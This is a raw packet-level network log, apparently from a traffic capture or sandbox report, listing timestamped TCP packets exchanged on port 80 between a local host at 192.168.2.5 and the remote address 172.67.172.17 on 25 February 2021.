Feb 25, 2021 11:04:07.813364029 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.813421965 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.813429117 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.813448906 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.813467026 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.813482046 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.813487053 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.813497066 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.813513041 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.813519001 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.813529968 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.813540936 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.813544989 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.813559055 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.813575029 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.813601017 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.814026117 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.814059973 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.814065933 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.814081907 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.814085007 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.814097881 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.814116955 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.814135075 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.814137936 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.814152956 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.814169884 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.814186096 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.814222097 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.814259052 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.814276934 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.814301968 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.814320087 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.814333916 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.814352989 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.814387083 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.815005064 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.815032959 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.815053940 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.815058947 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.815061092 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.815078020 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.815089941 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.815100908 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.815107107 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.815143108 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.815150976 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.815160990 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.815176964 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.815181971 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.815188885 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.815207958 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.815217018 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.815221071 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.815233946 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.815247059 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.815283060 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.816003084 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.816032887 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.816051960 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.816057920 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.816071987 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.816085100 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.816097975 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.816109896 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.816127062 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.816142082 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.816158056 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.816162109 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.816180944 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.816196918 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.816200018 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.816215038 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.816222906 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.816231966 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.816274881 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.816965103 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.816997051 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.817014933 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.817027092 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.817039967 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.817059040 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.817071915 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.817080021 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.817090034 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.817105055 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.817114115 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.817121029 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.817137003 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.817152023 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.817154884 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.817176104 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.817179918 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.817187071 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.817203999 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.817215919 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.817250013 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.817975044 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.818006039 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.818018913 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.818023920 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.818031073 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.818048954 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.818065882 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.818080902 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.818084955 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.818099976 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.818115950 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.818124056 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.818128109 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.818145037 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.818152905 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.818171024 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.818181992 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.818185091 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.818186045 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.818249941 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.818927050 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.818937063 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.818960905 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.818974972 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.818979025 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.818994045 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.819014072 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.819014072 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.819041967 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.819297075 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.819317102 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.819333076 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.819348097 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.819363117 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.819366932 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.819384098 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.819387913 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.819405079 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.819412947 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.819423914 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.819446087 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.819458961 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.819459915 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.819464922 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.819474936 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.819509983 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.819509983 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.819528103 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.819545031 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.819565058 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.820286989 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.820318937 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.820346117 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.820347071 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.820357084 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.820367098 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.820378065 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.820389032 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.820399046 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.820410967 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.820411921 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.820420027 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.820430040 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.820437908 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.820451021 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.820460081 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.820468903 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.820481062 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.820508957 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.821258068 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.821285009 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.821301937 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.821311951 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.821320057 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.821341038 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.821358919 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.821362972 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.821376085 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.821413040 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.821415901 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.821433067 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.821449995 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.821458101 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.821466923 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.821479082 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.821484089 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.821501017 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.821511030 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.821517944 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.821554899 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.822216034 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.822243929 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.822258949 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.822268963 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.822277069 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.822293043 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.822310925 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.822310925 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.822343111 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.822649956 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.822679043 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.822689056 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.822695017 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.822707891 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.822715998 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.822736025 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.822743893 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.822762012 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.822771072 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.822782040 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.822801113 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.822803974 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.822818041 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.822839975 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.822839975 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.822849035 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.822856903 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.822873116 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.822922945 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.823618889 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.823647022 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.823662996 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.823681116 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.823683023 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.823707104 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.823709965 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.823714018 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.823726892 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.823734045 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.823743105 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.823776007 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.823812008 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.824229956 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.824255943 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.824274063 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.824290037 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.824305058 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.824312925 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.824321985 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.824323893 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.824342012 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.824352980 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.824358940 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.824374914 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.824389935 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.824400902 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.824405909 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.824420929 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.824429035 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.824435949 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.824451923 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.824460030 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.824485064 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.825251102 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.825278044 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.825297117 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.825314999 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.825328112 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.825330019 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.825345993 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.825361967 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.825375080 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.825376987 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.825414896 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.825417995 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.825436115 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.825452089 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.825468063 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.825483084 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.825484991 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.825498104 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.825508118 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.825542927 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.826244116 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.826281071 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.826296091 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.826312065 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.826327085 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.826342106 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.826358080 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.826356888 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.826371908 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.826375008 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.826394081 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.826401949 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.826411009 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.826426983 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.826427937 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.826443911 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.826452971 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.826459885 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.826474905 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.826499939 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.826529026 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.827210903 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.827249050 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.827265978 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.827281952 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.827296972 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.827311039 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.827316046 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.827333927 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.827349901 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.827366114 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.827373981 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.827383041 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.827398062 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.827414036 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.827425957 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.827434063 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.827441931 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.827455997 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.827483892 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.828126907 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.828155994 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.828171968 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.828197002 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.828197002 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.828208923 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.828218937 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.828232050 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.828242064 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.828242064 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.828252077 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.828262091 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.828269958 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.828283072 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.828294992 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.828299046 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.828327894 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.828335047 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.828378916 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.829113960 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.829142094 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.829158068 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.829178095 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.829181910 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.829205036 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.829210043 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.829216957 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.829268932 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.829547882 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.829569101 CET	80	49716	172.67.172.17	192.168.2.5
